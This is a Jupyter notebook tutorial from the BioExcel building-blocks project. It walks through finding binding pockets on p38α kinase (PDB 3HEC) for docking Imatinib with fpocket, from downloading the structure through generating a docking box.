[Converting Ligand Pose to PDB format](pdbqt2pdb) 15. [Superposing Ligand Pose to the Target Protein Structure](catPdb) 16. [Comparing final result with experimental structure](viewFinal) 17. [Questions & Comments](questions) ***<img src="https://bioexcel.eu/wp-content/uploads/2019/04/Bioexcell_logo_1080px_transp.png" alt="Bioexcel2 logo" title="Bioexcel2 logo" width="400" />*** Input parameters**Input parameters** needed: - **pdb_code**: PDB code of the experimental complex structure (if exists).In this particular example, the **p38α** structure in complex with the **Imatinib drug** was experimentally solved and deposited in the **PDB database** under the **3HEC** PDB code. The protein structure from this PDB file will be used as a **target protein** for the **docking process**, after stripping the **small molecule**. An **APO structure**, or any other structure from the **p38α** [cluster 100](https://www.rcsb.org/search?request=%7B%22query%22%3A%7B%22type%22%3A%22terminal%22%2C%22service%22%3A%22sequence%22%2C%22parameters%22%3A%7B%22target%22%3A%22pdb_protein_sequence%22%2C%22value%22%3A%22RPTFYRQELNKTIWEVPERYQNLSPVGSGAYGSVCAAFDTKTGLRVAVKKLSRPFQSIIHAKRTYRELRLLKHMKHENVIGLLDVFTPARSLEEFNDVYLVTHLMGADLNNIVKCQKLTDDHVQFLIYQILRGLKYIHSADIIHRDLKPSNLAVNEDCELKILDFGLARHTDDEMTGYVATRWYRAPEIMLNWMHYNQTVDIWSVGCIMAELLTGRTLFPGTDHIDQLKLILRLVGTPGAELLKKISSESARNYIQSLTQMPKMNFANVFIGANPLAVDLLEKMLVLDSDKRITAAQALAHAYFAQYHDPDDEPVADPYDQSFESRDLLIDEWKSLTYDEVISFVPPP%22%2C%22identity_cutoff%22%3A1%2C%22evalue_cutoff%22%3A0.1%7D%2C%22node_id%22%3A0%7D%2C%22return_type%22%3A%22polymer_entity%22%2C%22request_options%22%3A%7B%22pager%22%3A%7B%22start%22%3A0%2C%22rows%22%3A25%7D%2C%22scoring_strategy%22%3A%22combined%22%2C%22sort%22%3A%5B%7B%22sort_by%22%3A%22score%22%2C%22direction%22%3A%22desc%22%7D%5D%7D%2C%22request_info%22%3A%7B%22src%22%3A%22ui%22%2C%22query_id%22%3A%22bea5861f8b38a9e25a3e626b39d6bcbf%22%7D%7D) (sharing a 100% of sequence similarity with the **p38α** structure) could also be used as a **target protein**. This structure of the **protein-ligand complex** will be also used in the last step of the tutorial to check **how close** the resulting **docking pose** is from the known **experimental structure**. ----- - **ligandCode**: Ligand PDB code (3-letter code) for the small molecule (e.g. STI).In this particular example, the small molecule chosen for the tutorial is the FDA-approved drug **Imatinib** (PDB Code STI), a type of cancer growth blocker, used in [diferent types of leukemia](https://go.drugbank.com/drugs/DB00619). ----- - **pockets_dir**: Name of a folder to write temporary files.
###Code
import nglview
import ipywidgets
pdb_code = "3HEC" # P38 + Imatinib
ligand_code = "STI" # Imatinib
pockets_dir = "pockets"
###Output
_____no_output_____
###Markdown
*** Fetching PDB structureDownloading the **PDB structure** with the **protein molecule** from the PDBe database.Alternatively, a **PDB file** can be used as a starting structure. *****Building Blocks** used: - [Pdb](https://biobb-io.readthedocs.io/en/latest/api.htmlmodule-api.pdb) from **biobb_io.api.pdb*****
###Code
from biobb_io.api.pdb import pdb
download_pdb = "download.pdb"
prop = {
"pdb_code": pdb_code,
"filter": ["ATOM", "HETATM"]
}
pdb(output_pdb_path=download_pdb,
properties=prop)
###Output
2021-05-17 15:44:24,396 [MainThread ] [INFO ] Downloading: 3hec from: https://www.ebi.ac.uk/pdbe/entry-files/download/pdb3hec.ent
/anaconda3/envs/biobb_VS_tutorial/lib/python3.7/site-packages/urllib3/connectionpool.py:1020: InsecureRequestWarning: Unverified HTTPS request is being made to host 'www.ebi.ac.uk'. Adding certificate verification is strongly advised. See: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#ssl-warnings
InsecureRequestWarning,
2021-05-17 15:44:24,864 [MainThread ] [INFO ] Writting pdb to: download.pdb
2021-05-17 15:44:24,870 [MainThread ] [INFO ] Filtering lines NOT starting with one of these words: ['ATOM', 'HETATM']
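For reference, the same entry file could be fetched by hand using the PDBe URL that appears in the log above. This is a minimal standard-library sketch shown only as an illustration; the `pdb()` building block above remains the intended way to do this in the workflow (it also filters the file down to ATOM/HETATM records, which this sketch does not).

```python
import urllib.request

# Same PDBe entry file used by the building block above.
url = 'https://www.ebi.ac.uk/pdbe/entry-files/download/pdb3hec.ent'
with urllib.request.urlopen(url) as response, open('download_manual.pdb', 'wb') as out:
    out.write(response.read())
```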
###Markdown
Visualizing 3D structureVisualizing the downloaded/given **PDB structure** using **NGL**.Note (and try to identify) the **Imatinib small molecule (STI)** and the **detergent (β-octyl glucoside) (BOG)** used in the experimental reservoir solution to obtain the crystal.
###Code
view = nglview.show_structure_file(download_pdb, default=True)
view.center()
view._remote_call('setSize', target='Widget', args=['','600px'])
view.render_image()
view.download_image(filename='ngl1.png')
view
###Output
_____no_output_____
###Markdown
*** Extract Protein StructureExtract **protein structure** from the **downloaded PDB file**. Removing **any extra molecule** (ligands, ions, water molecules). The **protein structure** will be used as a **target** in the **protein-ligand docking process**. *****Building Blocks** used: - [extract_molecule](https://biobb-structure-utils.readthedocs.io/en/latest/utils.htmlmodule-utils.extract_molecule) from **biobb_structure_utils.utils.extract_molecule*****
###Code
from biobb_structure_utils.utils.extract_molecule import extract_molecule
pdb_protein = "pdb_protein.pdb"
extract_molecule(input_structure_path=download_pdb,
output_molecule_path = pdb_protein)
###Output
2021-05-17 15:44:29,192 [MainThread ] [INFO ] Creating b33b03fe-5761-4996-beca-971e0ea316f5 temporary folder
2021-05-17 15:44:29,956 [MainThread ] [INFO ] check_structure -i /home/gbayarri_local/projects/BioBB/tutorials/biobb_wf_virtual-screening/biobb_wf_virtual-screening/notebooks/fpocket/download.pdb -o pdb_protein.pdb --force_save --non_interactive command_list --list b33b03fe-5761-4996-beca-971e0ea316f5/extract_prot.lst
2021-05-17 15:44:29,958 [MainThread ] [INFO ] Exit code 0
2021-05-17 15:44:29,959 [MainThread ] [INFO ] ===============================================================================
= BioBB structure checking utility v3.7.2 =
= A. Hospital, P. Andrio, J.L. Gelpi 2018-20 =
===============================================================================
Warning: sequence features only available in mmCIF format or with external fasta input
Structure /home/gbayarri_local/projects/BioBB/tutorials/biobb_wf_virtual-screening/biobb_wf_virtual-screening/notebooks/fpocket/download.pdb loaded
Title:
Experimental method: unknown
Resolution: None A
Num. models: 1
Num. chains: 1 (A: Protein)
Num. residues: 420
Num. residues with ins. codes: 0
Num. HETATM residues: 91
Num. ligands or modified residues: 2
Num. water mol.: 89
Num. atoms: 2814
Small mol ligands found
STI A1
BOG A353
Step 1: ligands --remove All
Running ligands. Options: --remove All
2 Ligands detected
STI A1
BOG A353
Ligands removed All (2)
Step 2: water --remove Yes
Running water. Options: --remove Yes
89 Water molecules detected
89 Water molecules removed
Command list completed
Final Num. models: 1
Final Num. chains: 1 (A: Protein)
Final Num. residues: 329
Final Num. residues with ins. codes: 0
Final Num. HETATM residues: 0
Final Num. ligands or modified residues: 0
Final Num. water mol.: 0
Final Num. atoms: 2668
Structure saved on pdb_protein.pdb
2021-05-17 15:44:29,960 [MainThread ] [INFO ] Removing b33b03fe-5761-4996-beca-971e0ea316f5 temporary folder
###Markdown
Visualizing 3D structureVisualizing the downloaded/given **PDB structure** using **NGL**.Note that the **small molecules** included in the original structure are now gone. The new structure only contains the **protein molecule**, which will be used as a **target** for the **protein-ligand docking**.
###Code
view = nglview.show_structure_file(pdb_protein, default=False)
view.add_representation(repr_type='cartoon',
selection='not het',
colorScheme = 'atomindex')
view.center()
view._remote_call('setSize', target='Widget', args=['','600px'])
view.render_image()
view.download_image(filename='ngl2.png')
view
###Output
_____no_output_____
###Markdown
*** Computing Protein Cavities (fpocket)Computing the **protein cavities** (pockets) using the well-known [**fpocket**](https://bmcbioinformatics.biomedcentral.com/articles/10.1186/1471-2105-10-168) tool.These **cavities** will then be used in the **docking procedure** to try to find the **best region of the protein surface** where the small molecule can **bind**. Although in this particular example we already know the **binding site** region, since we started from a **protein-ligand complex** structure with the ligand already bound in the **binding site** of interest, this is not always the case. In the cases where we do not know these regions, **fpocket** will help us identify the possible **binding sites** of our **target protein**.**fpocket** input parameters, such as the **minimum** and **maximum radius** (in Angstroms) the alpha spheres might have in a **binding pocket**, can be adjusted (min_radius, max_radius). Parameters used in this particular example are 3Å for the **minimum radius** and 6Å for the **maximum radius**. The **minimum number of alpha spheres** a pocket must contain in order to figure in the results is also adjusted to 35. See the [fpocket manual](http://fpocket.sourceforge.net/manual_fpocket2.pdf) for more information. *****Building Blocks** used: - [fpocket_run](https://biobb-vs.readthedocs.io/en/latest/fpocket.htmlmodule-fpocket.fpocket_run) from **biobb_vs.fpocket.fpocket_run*****
###Code
from biobb_vs.fpocket.fpocket_run import fpocket_run
fpocket_all_pockets = "fpocket_all_pockets.zip"
fpocket_summary = "fpocket_summary.json"
prop = {
"min_radius": 3,
"max_radius": 6,
"num_spheres": 35
}
fpocket_run(input_pdb_path=pdb_protein,
output_pockets_zip = fpocket_all_pockets,
output_summary=fpocket_summary,
properties=prop)
###Output
_____no_output_____
###Markdown
Checking fpocket output (json)Checking the **fpocket** output from the **json file**. Every **pocket** has a separate entry in the json output, with information such as: **score, druggability score, volume, hydrophobicity, polarity or flexibility**.
###Code
import json
with open(fpocket_summary, 'r') as json_file:
data = json.load(json_file)
print(json.dumps(data, indent=4))
###Output
{
"pocket1": {
"score": 0.341,
"druggability_score": 0.876,
"number_of_alpha_spheres": 227,
"total_sasa": 357.1,
"polar_sasa": 93.837,
"apolar_sasa": 263.263,
"volume": 1486.347,
"mean_local_hydrophobic_density": 69.241,
"mean_alpha_sphere_radius": 3.576,
"mean_alp_sph_solvent_access": 0.445,
"apolar_alpha_sphere_proportion": 0.731,
"hydrophobicity_score": 33.129,
"volume_score": 4.258,
"polarity_score": 17,
"charge_score": 0,
"proportion_of_polar_atoms": 30.328,
"alpha_sphere_density": 8.901,
"cent_of_mass_alpha_sphere_max_dist": 24.197,
"flexibility": 0.62
},
"pocket14": {
"score": -0.129,
"druggability_score": 0.041,
"number_of_alpha_spheres": 61,
"total_sasa": 188.671,
"polar_sasa": 61.87,
"apolar_sasa": 126.801,
"volume": 539.674,
"mean_local_hydrophobic_density": 23.636,
"mean_alpha_sphere_radius": 3.61,
"mean_alp_sph_solvent_access": 0.429,
"apolar_alpha_sphere_proportion": 0.541,
"hydrophobicity_score": 14.438,
"volume_score": 4.562,
"polarity_score": 8,
"charge_score": 2,
"proportion_of_polar_atoms": 30.0,
"alpha_sphere_density": 5.224,
"cent_of_mass_alpha_sphere_max_dist": 12.921,
"flexibility": 0.401
},
"pocket6": {
"score": 0.064,
"druggability_score": 0.028,
"number_of_alpha_spheres": 253,
"total_sasa": 525.65,
"polar_sasa": 149.84,
"apolar_sasa": 375.81,
"volume": 1898.144,
"mean_local_hydrophobic_density": 43.179,
"mean_alpha_sphere_radius": 3.676,
"mean_alp_sph_solvent_access": 0.507,
"apolar_alpha_sphere_proportion": 0.617,
"hydrophobicity_score": 36.767,
"volume_score": 4.256,
"polarity_score": 17,
"charge_score": 8,
"proportion_of_polar_atoms": 33.103,
"alpha_sphere_density": 10.64,
"cent_of_mass_alpha_sphere_max_dist": 26.572,
"flexibility": 0.403
},
"pocket3": {
"score": 0.223,
"druggability_score": 0.017,
"number_of_alpha_spheres": 36,
"total_sasa": 73.903,
"polar_sasa": 30.111,
"apolar_sasa": 43.791,
"volume": 288.593,
"mean_local_hydrophobic_density": 17.143,
"mean_alpha_sphere_radius": 3.514,
"mean_alp_sph_solvent_access": 0.47,
"apolar_alpha_sphere_proportion": 0.583,
"hydrophobicity_score": 41.25,
"volume_score": 3.75,
"polarity_score": 4,
"charge_score": 0,
"proportion_of_polar_atoms": 27.586,
"alpha_sphere_density": 5.179,
"cent_of_mass_alpha_sphere_max_dist": 11.603,
"flexibility": 0.658
},
"pocket4": {
"score": 0.196,
"druggability_score": 0.006,
"number_of_alpha_spheres": 41,
"total_sasa": 100.284,
"polar_sasa": 42.318,
"apolar_sasa": 57.966,
"volume": 417.123,
"mean_local_hydrophobic_density": 11.0,
"mean_alpha_sphere_radius": 3.563,
"mean_alp_sph_solvent_access": 0.551,
"apolar_alpha_sphere_proportion": 0.39,
"hydrophobicity_score": 30.727,
"volume_score": 5.636,
"polarity_score": 7,
"charge_score": 2,
"proportion_of_polar_atoms": 46.875,
"alpha_sphere_density": 5.926,
"cent_of_mass_alpha_sphere_max_dist": 15.998,
"flexibility": 0.441
},
"pocket10": {
"score": -0.016,
"druggability_score": 0.005,
"number_of_alpha_spheres": 73,
"total_sasa": 161.194,
"polar_sasa": 69.414,
"apolar_sasa": 91.78,
"volume": 538.763,
"mean_local_hydrophobic_density": 16.32,
"mean_alpha_sphere_radius": 3.577,
"mean_alp_sph_solvent_access": 0.485,
"apolar_alpha_sphere_proportion": 0.342,
"hydrophobicity_score": 24.765,
"volume_score": 4.235,
"polarity_score": 6,
"charge_score": 5,
"proportion_of_polar_atoms": 42.857,
"alpha_sphere_density": 5.322,
"cent_of_mass_alpha_sphere_max_dist": 13.95,
"flexibility": 0.329
},
"pocket11": {
"score": -0.045,
"druggability_score": 0.004,
"number_of_alpha_spheres": 36,
"total_sasa": 134.156,
"polar_sasa": 48.415,
"apolar_sasa": 85.742,
"volume": 410.883,
"mean_local_hydrophobic_density": 16.0,
"mean_alpha_sphere_radius": 3.587,
"mean_alp_sph_solvent_access": 0.657,
"apolar_alpha_sphere_proportion": 0.5,
"hydrophobicity_score": -2.3,
"volume_score": 4.5,
"polarity_score": 8,
"charge_score": 0,
"proportion_of_polar_atoms": 38.71,
"alpha_sphere_density": 4.762,
"cent_of_mass_alpha_sphere_max_dist": 13.522,
"flexibility": 0.378
},
"pocket5": {
"score": 0.074,
"druggability_score": 0.003,
"number_of_alpha_spheres": 64,
"total_sasa": 123.274,
"polar_sasa": 55.33,
"apolar_sasa": 67.944,
"volume": 489.525,
"mean_local_hydrophobic_density": 23.394,
"mean_alpha_sphere_radius": 3.616,
"mean_alp_sph_solvent_access": 0.474,
"apolar_alpha_sphere_proportion": 0.516,
"hydrophobicity_score": 43.071,
"volume_score": 4.643,
"polarity_score": 5,
"charge_score": 1,
"proportion_of_polar_atoms": 35.135,
"alpha_sphere_density": 4.823,
"cent_of_mass_alpha_sphere_max_dist": 11.6,
"flexibility": 0.6
},
"pocket2": {
"score": 0.287,
"druggability_score": 0.002,
"number_of_alpha_spheres": 41,
"total_sasa": 10.188,
"polar_sasa": 5.357,
"apolar_sasa": 4.831,
"volume": 119.951,
"mean_local_hydrophobic_density": 5.0,
"mean_alpha_sphere_radius": 3.278,
"mean_alp_sph_solvent_access": 0.426,
"apolar_alpha_sphere_proportion": 0.195,
"hydrophobicity_score": 18.583,
"volume_score": 4.5,
"polarity_score": 8,
"charge_score": 1,
"proportion_of_polar_atoms": 40.741,
"alpha_sphere_density": 3.14,
"cent_of_mass_alpha_sphere_max_dist": 7.536,
"flexibility": 0.23
},
"pocket8": {
"score": 0.011,
"druggability_score": 0.002,
"number_of_alpha_spheres": 40,
"total_sasa": 127.722,
"polar_sasa": 55.264,
"apolar_sasa": 72.458,
"volume": 390.785,
"mean_local_hydrophobic_density": 7.818,
"mean_alpha_sphere_radius": 3.646,
"mean_alp_sph_solvent_access": 0.536,
"apolar_alpha_sphere_proportion": 0.275,
"hydrophobicity_score": 2.182,
"volume_score": 4.0,
"polarity_score": 8,
"charge_score": 1,
"proportion_of_polar_atoms": 43.333,
"alpha_sphere_density": 5.185,
"cent_of_mass_alpha_sphere_max_dist": 12.583,
"flexibility": 0.642
},
"pocket7": {
"score": 0.03,
"druggability_score": 0.001,
"number_of_alpha_spheres": 76,
"total_sasa": 175.922,
"polar_sasa": 101.049,
"apolar_sasa": 74.873,
"volume": 582.784,
"mean_local_hydrophobic_density": 10.952,
"mean_alpha_sphere_radius": 3.707,
"mean_alp_sph_solvent_access": 0.527,
"apolar_alpha_sphere_proportion": 0.276,
"hydrophobicity_score": 9.562,
"volume_score": 4.562,
"polarity_score": 12,
"charge_score": -2,
"proportion_of_polar_atoms": 45.098,
"alpha_sphere_density": 6.008,
"cent_of_mass_alpha_sphere_max_dist": 16.936,
"flexibility": 0.4
},
"pocket12": {
"score": -0.065,
"druggability_score": 0.001,
"number_of_alpha_spheres": 36,
"total_sasa": 84.911,
"polar_sasa": 25.737,
"apolar_sasa": 59.174,
"volume": 255.35,
"mean_local_hydrophobic_density": 17.0,
"mean_alpha_sphere_radius": 3.681,
"mean_alp_sph_solvent_access": 0.565,
"apolar_alpha_sphere_proportion": 0.5,
"hydrophobicity_score": 39.818,
"volume_score": 3.455,
"polarity_score": 3,
"charge_score": -1,
"proportion_of_polar_atoms": 45.833,
"alpha_sphere_density": 2.675,
"cent_of_mass_alpha_sphere_max_dist": 6.432,
"flexibility": 0.588
},
"pocket9": {
"score": 0.003,
"druggability_score": 0.0,
"number_of_alpha_spheres": 61,
"total_sasa": 141.327,
"polar_sasa": 88.192,
"apolar_sasa": 53.136,
"volume": 482.303,
"mean_local_hydrophobic_density": 12.632,
"mean_alpha_sphere_radius": 3.667,
"mean_alp_sph_solvent_access": 0.574,
"apolar_alpha_sphere_proportion": 0.311,
"hydrophobicity_score": 41.429,
"volume_score": 3.714,
"polarity_score": 4,
"charge_score": -1,
"proportion_of_polar_atoms": 45.238,
"alpha_sphere_density": 4.848,
"cent_of_mass_alpha_sphere_max_dist": 12.952,
"flexibility": 0.541
},
"pocket13": {
"score": -0.108,
"druggability_score": 0.0,
"number_of_alpha_spheres": 39,
"total_sasa": 126.606,
"polar_sasa": 68.64,
"apolar_sasa": 57.966,
"volume": 368.26,
"mean_local_hydrophobic_density": 10.0,
"mean_alpha_sphere_radius": 3.837,
"mean_alp_sph_solvent_access": 0.489,
"apolar_alpha_sphere_proportion": 0.282,
"hydrophobicity_score": 28.636,
"volume_score": 4.273,
"polarity_score": 6,
"charge_score": 1,
"proportion_of_polar_atoms": 48.148,
"alpha_sphere_density": 3.758,
"cent_of_mass_alpha_sphere_max_dist": 10.446,
"flexibility": 0.676
}
}
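The same dictionary can be used to rank the candidate cavities before any filtering. A short illustrative sketch that sorts the pockets loaded into `data` by their druggability score:

```python
# Sort pockets by druggability score, highest first.
ranked = sorted(data.items(),
                key=lambda kv: kv[1]['druggability_score'],
                reverse=True)
for name, props in ranked[:3]:
    print(name, props['druggability_score'], props['volume'])
```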
###Markdown
*** Filtering Protein Cavities (fpocket output)Filtering the **protein cavities** (pockets) identified by **fpocket**.In this particular example, the biggest **cavities**, with a **volume** between 800 and 2000 ($Å^{3}$), large enough to fit the input small molecule, are selected. *****Building Blocks** used: - [fpocket_filter](https://biobb-vs.readthedocs.io/en/latest/fpocket.htmlmodule-fpocket.fpocket_filter) from **biobb_vs.fpocket.fpocket_filter*****
###Code
from biobb_vs.fpocket.fpocket_filter import fpocket_filter
fpocket_filter_pockets = "fpocket_filter_pockets.zip"
prop = {
"volume": [800, 2000]
}
fpocket_filter(input_pockets_zip=fpocket_all_pockets,
input_summary = fpocket_summary,
output_filter_pockets_zip=fpocket_filter_pockets,
properties=prop)
###Output
2021-05-17 15:44:40,770 [MainThread ] [INFO ] Performing a search under the next parameters: volume: [800, 2000]
2021-05-17 15:44:40,772 [MainThread ] [INFO ] Found 2 matches:
**********
pocket1
**********
score: 0.341
druggability_score: 0.876
volume: 1486.347
**********
pocket6
**********
score: 0.064
druggability_score: 0.028
volume: 1898.144
2021-05-17 15:44:40,774 [MainThread ] [INFO ] Creating 061d0905-ffb1-4c88-8ba1-bc67ed541a5e temporary folder
2021-05-17 15:44:40,782 [MainThread ] [INFO ] Extracting: /home/gbayarri_local/projects/BioBB/tutorials/biobb_wf_virtual-screening/biobb_wf_virtual-screening/notebooks/fpocket/fpocket_all_pockets.zip
2021-05-17 15:44:40,782 [MainThread ] [INFO ] to:
2021-05-17 15:44:40,783 [MainThread ] [INFO ] ['061d0905-ffb1-4c88-8ba1-bc67ed541a5e/pocket10_atm.pdb', '061d0905-ffb1-4c88-8ba1-bc67ed541a5e/pocket10_vert.pqr', '061d0905-ffb1-4c88-8ba1-bc67ed541a5e/pocket11_atm.pdb', '061d0905-ffb1-4c88-8ba1-bc67ed541a5e/pocket11_vert.pqr', '061d0905-ffb1-4c88-8ba1-bc67ed541a5e/pocket12_atm.pdb', '061d0905-ffb1-4c88-8ba1-bc67ed541a5e/pocket12_vert.pqr', '061d0905-ffb1-4c88-8ba1-bc67ed541a5e/pocket13_atm.pdb', '061d0905-ffb1-4c88-8ba1-bc67ed541a5e/pocket13_vert.pqr', '061d0905-ffb1-4c88-8ba1-bc67ed541a5e/pocket14_atm.pdb', '061d0905-ffb1-4c88-8ba1-bc67ed541a5e/pocket14_vert.pqr', '061d0905-ffb1-4c88-8ba1-bc67ed541a5e/pocket1_atm.pdb', '061d0905-ffb1-4c88-8ba1-bc67ed541a5e/pocket1_vert.pqr', '061d0905-ffb1-4c88-8ba1-bc67ed541a5e/pocket2_atm.pdb', '061d0905-ffb1-4c88-8ba1-bc67ed541a5e/pocket2_vert.pqr', '061d0905-ffb1-4c88-8ba1-bc67ed541a5e/pocket3_atm.pdb', '061d0905-ffb1-4c88-8ba1-bc67ed541a5e/pocket3_vert.pqr', '061d0905-ffb1-4c88-8ba1-bc67ed541a5e/pocket4_atm.pdb', '061d0905-ffb1-4c88-8ba1-bc67ed541a5e/pocket4_vert.pqr', '061d0905-ffb1-4c88-8ba1-bc67ed541a5e/pocket5_atm.pdb', '061d0905-ffb1-4c88-8ba1-bc67ed541a5e/pocket5_vert.pqr', '061d0905-ffb1-4c88-8ba1-bc67ed541a5e/pocket6_atm.pdb', '061d0905-ffb1-4c88-8ba1-bc67ed541a5e/pocket6_vert.pqr', '061d0905-ffb1-4c88-8ba1-bc67ed541a5e/pocket7_atm.pdb', '061d0905-ffb1-4c88-8ba1-bc67ed541a5e/pocket7_vert.pqr', '061d0905-ffb1-4c88-8ba1-bc67ed541a5e/pocket8_atm.pdb', '061d0905-ffb1-4c88-8ba1-bc67ed541a5e/pocket8_vert.pqr', '061d0905-ffb1-4c88-8ba1-bc67ed541a5e/pocket9_atm.pdb', '061d0905-ffb1-4c88-8ba1-bc67ed541a5e/pocket9_vert.pqr']
2021-05-17 15:44:40,784 [MainThread ] [INFO ] Creating fpocket_filter_pockets.zip output file
2021-05-17 15:44:40,786 [MainThread ] [INFO ] Adding:
2021-05-17 15:44:40,787 [MainThread ] [INFO ] ['061d0905-ffb1-4c88-8ba1-bc67ed541a5e/pocket1_atm.pdb', '061d0905-ffb1-4c88-8ba1-bc67ed541a5e/pocket1_vert.pqr', '061d0905-ffb1-4c88-8ba1-bc67ed541a5e/pocket6_atm.pdb', '061d0905-ffb1-4c88-8ba1-bc67ed541a5e/pocket6_vert.pqr']
2021-05-17 15:44:40,787 [MainThread ] [INFO ] to: /home/gbayarri_local/projects/BioBB/tutorials/biobb_wf_virtual-screening/biobb_wf_virtual-screening/notebooks/fpocket/fpocket_filter_pockets.zip
2021-05-17 15:44:40,789 [MainThread ] [INFO ] Removed temporary folder: 061d0905-ffb1-4c88-8ba1-bc67ed541a5e
###Markdown
Extract selected pockets (cavities)Extract the selected **pockets** (cavities) from the filtered list (zip file, fpocket_filter_pockets).Writing the information in the ***pockets_dir*** folder.Also saving the list of **PDB files** (protein residues forming the pocket) and **PQR files** (cavity, pocket), to be used in following **visualization step**.
###Code
import os
import shutil
from pathlib import Path, PurePath
import zipfile
if Path(pockets_dir).exists(): shutil.rmtree(pockets_dir)
os.mkdir(pockets_dir)
with zipfile.ZipFile(fpocket_filter_pockets, 'r') as zip_ref:
zip_ref.extractall(pockets_dir)
path_pockets = [str(i) for i in Path(pockets_dir).iterdir()]
path_pockets_pdb = [str(i) for i in Path(pockets_dir).iterdir() if PurePath(i).suffix == '.pdb']
path_pockets_pqr = [str(i) for i in Path(pockets_dir).iterdir() if PurePath(i).suffix == '.pqr']
###Output
_____no_output_____
###Markdown
Visualizing selected pockets (cavities)Visualizing the selected **pockets** (cavities) from the filtered list using **NGL viewer**.**Protein residues** forming the **cavity** are represented in **random-colored surfaces**. **Pockets** are represented in a **blue-colored mesh**. Different **pockets** are identified with a floating **label**.
###Code
import re
import random
# random colors for cavities
r = lambda: random.randint(0,255)
# load structure
view = nglview.NGLWidget()
c = view.add_component(pdb_protein)
# load cavities (d) and pockets (p) and create pocketNames list
c = {}
p = {}
pocketNames = []
for pock in path_pockets:
g = re.findall('(?:pocket)(\d+)(?:_\w+)\.(\w+)', pock)
i = g[0][0]
suff = g[0][1]
if not [item for item in pocketNames if ('pocket' + i) in item]: pocketNames.append(('pocket' + i, int(i)))
if suff == 'pdb':
c[i] = view.add_component(pock)
c[i].clear()
else:
p[i] = view.add_component(pock)
p[i].clear()
# sort pocket names
pocketNames.sort(key=lambda tup: tup[1])
# representation for cavities
for pock in path_pockets_pdb:
g = re.findall('(?:pocket)(\d+)(?:_\w+)\.(\w+)', pock)
i = g[0][0]
c[i].add_surface(color='#%02X%02X%02X' % (r(),r(),r()),
radius='1.5',
lowResolution= True,
# 0: low resolution
smooth=1,
useWorker= True,
wrap= True)
# representation for pockets
for pock in path_pockets_pqr:
g = re.findall('(?:pocket)(\d+)(?:_\w+)\.(\w+)', pock)
i = g[0][0]
p[i].add_surface( component=i, color='skyblue', surfaceType= 'av', contour=True )
view.center()
view._remote_call('setSize', target='Widget', args=['','600px'])
view
# show pocket labels
code = """
var stage = this.stage;
var view = this.stage.viewer;
var clist_len = stage.compList.length;
var i = 0;
for(i = 0; i <= clist_len; i++){
if(stage.compList[i] != undefined && stage.compList[i].structure != undefined && stage.compList[i].object.name.indexOf('pqr') != -1) {
var elm = document.createElement("div");
elm.innerText = 'pocket' + stage.compList[i].object.name.match(/\d+/g)
elm.style.color = "black";
elm.style.background = "rgba(201, 149, 6, .8)";
elm.style.padding = "8px";
stage.compList[i].addAnnotation(stage.compList[i].structure.center, elm)
}
}
"""
view._execute_js_code(code)
view.render_image()
view.download_image(filename='ngl3.png')
view
###Output
_____no_output_____
###Markdown
Select pocket (cavity)Select a specific **pocket** (cavity) from the filtered list to be used in the **docking procedure**. If **fpocket** has been able to identify the correct **binding site**, which we know from the original **protein-ligand structure**, it just needs to be selected. In this particular example, the pocket we are interested in is the **pocket number 6**. Choose a **pocket** from the **DropDown list**:
###Code
mdsel = ipywidgets.Dropdown(
options=pocketNames,
description='Sel. pocket:',
disabled=False,
)
display(mdsel)
###Output
_____no_output_____
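If the notebook is executed non-interactively (e.g., run-all), the widget keeps its default value, which is the first pocket in the filtered list. A small convenience sketch to pre-select pocket 6 programmatically, assuming it survived the volume filter above:
```python
# The Dropdown options are (label, value) tuples, so the widget value is the integer pocket id.
# Pre-select pocket 6 (the known binding site in this example) if it is in the filtered list.
if any(num == 6 for _, num in pocketNames):
    mdsel.value = 6
print("Selected pocket:", mdsel.value)
```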
###Markdown
*** Extract Pocket Cavity Extract the selected **protein cavity** (pocket) from the **fpocket** results.It will be used to generate the **docking box** in the **following step**.*****Building Blocks** used: - [fpocket_select](https://biobb-vs.readthedocs.io/en/latest/fpocket.htmlmodule-fpocket.fpocket_select) from **biobb_vs.fpocket.fpocket_select*****
###Code
from biobb_vs.fpocket.fpocket_select import fpocket_select
fpocket_cavity = "fpocket_cavity.pdb"
fpocket_pocket = "fpocket_pocket.pqr"
prop = {
"pocket": mdsel.value
}
fpocket_select(input_pockets_zip=fpocket_filter_pockets,
output_pocket_pdb = fpocket_cavity,
output_pocket_pqr=fpocket_pocket,
properties=prop)
###Output
2021-05-17 15:45:08,171 [MainThread ] [INFO ] Creating 7d17de5e-802f-45b7-8830-92f5b35506d7 temporary folder
2021-05-17 15:45:08,174 [MainThread ] [INFO ] Extracting: /home/gbayarri_local/projects/BioBB/tutorials/biobb_wf_virtual-screening/biobb_wf_virtual-screening/notebooks/fpocket/fpocket_filter_pockets.zip
2021-05-17 15:45:08,175 [MainThread ] [INFO ] to:
2021-05-17 15:45:08,176 [MainThread ] [INFO ] ['7d17de5e-802f-45b7-8830-92f5b35506d7/pocket1_atm.pdb', '7d17de5e-802f-45b7-8830-92f5b35506d7/pocket1_vert.pqr', '7d17de5e-802f-45b7-8830-92f5b35506d7/pocket6_atm.pdb', '7d17de5e-802f-45b7-8830-92f5b35506d7/pocket6_vert.pqr']
2021-05-17 15:45:08,178 [MainThread ] [INFO ] Saving fpocket_cavity.pdb file
2021-05-17 15:45:08,179 [MainThread ] [INFO ] Saving fpocket_pocket.pqr file
2021-05-17 15:45:08,181 [MainThread ] [INFO ] Removed temporary folder: 7d17de5e-802f-45b7-8830-92f5b35506d7
###Markdown
*** Generating Cavity Box Generating a **box** surrounding the selected **protein cavity** (pocket), to be used in the **docking procedure**. The **box** is defining the region on the **surface** of the **protein target** where the **docking program** should explore a possible **ligand dock**.An offset of **12 Angstroms** is used to generate a **big enough box** to fit the **small molecule** and its possible rotations.*****Building Blocks** used: - [box](https://biobb-vs.readthedocs.io/en/latest/utils.htmlmodule-utils.box) from **biobb_vs.utils.box*****
###Code
from biobb_vs.utils.box import box
output_box = "box.pdb"
prop = {
"offset": 12,
"box_coordinates": True
}
box(input_pdb_path = fpocket_pocket,
output_pdb_path = output_box,
properties=prop)
###Output
/anaconda3/envs/biobb_VS_tutorial/lib/python3.7/site-packages/Bio/SubsMat/__init__.py:131: BiopythonDeprecationWarning: Bio.SubsMat has been deprecated, and we intend to remove it in a future release of Biopython. As an alternative, please consider using Bio.Align.substitution_matrices as a replacement, and contact the Biopython developers if you still need the Bio.SubsMat module.
BiopythonDeprecationWarning,
2021-05-17 15:45:10,804 [MainThread ] [INFO ] Loading pocket PQR selection from fpocket_pocket.pqr
